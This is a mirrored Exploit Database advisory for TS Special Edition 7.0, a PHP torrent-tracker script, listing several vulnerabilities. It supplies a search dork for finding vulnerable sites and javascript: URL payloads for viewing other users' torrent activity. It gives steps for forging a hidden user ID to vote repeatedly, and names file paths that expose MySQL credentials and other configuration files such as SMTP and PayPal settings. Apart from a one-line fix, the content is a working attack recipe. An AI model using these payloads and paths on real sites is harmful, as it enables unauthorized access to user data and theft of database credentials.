TS Special Edition 7.0 – Multiple Vulnerabilities

• Exploit Database
• 11 阅读

• 作者： IHTeam
  日期： 2010-05-18
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12645/

• ##############################################################################################
  #
  # TS Special Edition <= v.7.0 Multiple Vulnerabilities
  # Dork: "Powered by TS Special Edition"
  # Site: http://templateshares.net
  # Download: http://templateshares.net/special/purchase
  # Reported on 02/05/2010
  #
  # Author: IHTeam
  #
  ##############################################################################################
  #
  # See any seed/leech files of any users
  #
  # 1) Open any userdatail you want (Ex: /userdetails.php?id=1)
  # 2) Paste in url bar this code for:
  # 2.1) javascript:TSAjaxRequest('showuploaded'); <---- See Uploaded Torrent
  # 2.2) javascript:TSAjaxRequest('showcompleted'); <---- See Completed
  Torrent
  # 2.3) javascript:TSAjaxRequest('showleechs'); <---- See In Leech
  Torrents
  # 2.4) javascript:TSAjaxRequest('showseeds'); <---- See In Seed Torrents
  # 2.5) javascript:TSAjaxRequest('showsnatches'); <---- See Recently
  Downloaded
  #
  ##############################################################################################
  #
  # Bypass Vote System
  #
  # 1) Open any torrent file datail (Ex: /details.php?id=1)
  # 2) Edit HTML Source code with FireBug or Opera
  # 3) Search 'form id="quickrate"' and edit these information:
  # 3.1) <input type="hidden" value="CHAGE_YOUR_ID_HERE" name="userid">
  # 3.2) javascript:TSQuickRate('torrent_1', 'CHAGE_YOUR_ID_HERE');
  # 4) Apply changes and vote the torrent every time you want
  #
  ##############################################################################################
  #
  # MySQL Credential
  #
  # You can see MySQL Credential by opening /config/DATABASE
  #
  # Ex: www.mysite.com/config/DATABASE
  #
  a:4:{s:10:"mysql_host";s:9:"HOSTNAME_OF_MYSQL_DATABASE";s:10:"mysql_user";s:11:"USERNAME_OF_MYSQL"
  #
  ;s:10:"mysql_pass";s:10:"PASSWORD_OF_MYSQL";s:8:"mysql_db";s:21:"DATABASE_NAME";}
  #
  # It can be fixed adding .htaccess in /config/ directory
  ##############################################################################################
  #
  # Others configuration files
  #
  # 1) /config/WAITSLOT
  # 2) /config/TWEAK
  # 3) /config/THEME
  # 4) /config/STAFFTEAM
  # 5) /config/SMTP
  # 6) /config/SEO
  # 7) /config/SECURITY
  # 8) /config/REDIRECT
  # 9) /config/PJIRC
  # 10) /config/PAYPAL
  # 11) /config/MAIN
  # 12) /config/KPS
  # 13) /config/FORUMCP
  # 14) /config/EXTRA
  # 15) /config/DATETIME
  # 16) /config/CLEANUP
  # 17) /pjirc/pjirc.cfg
  #
  ##############################################################################################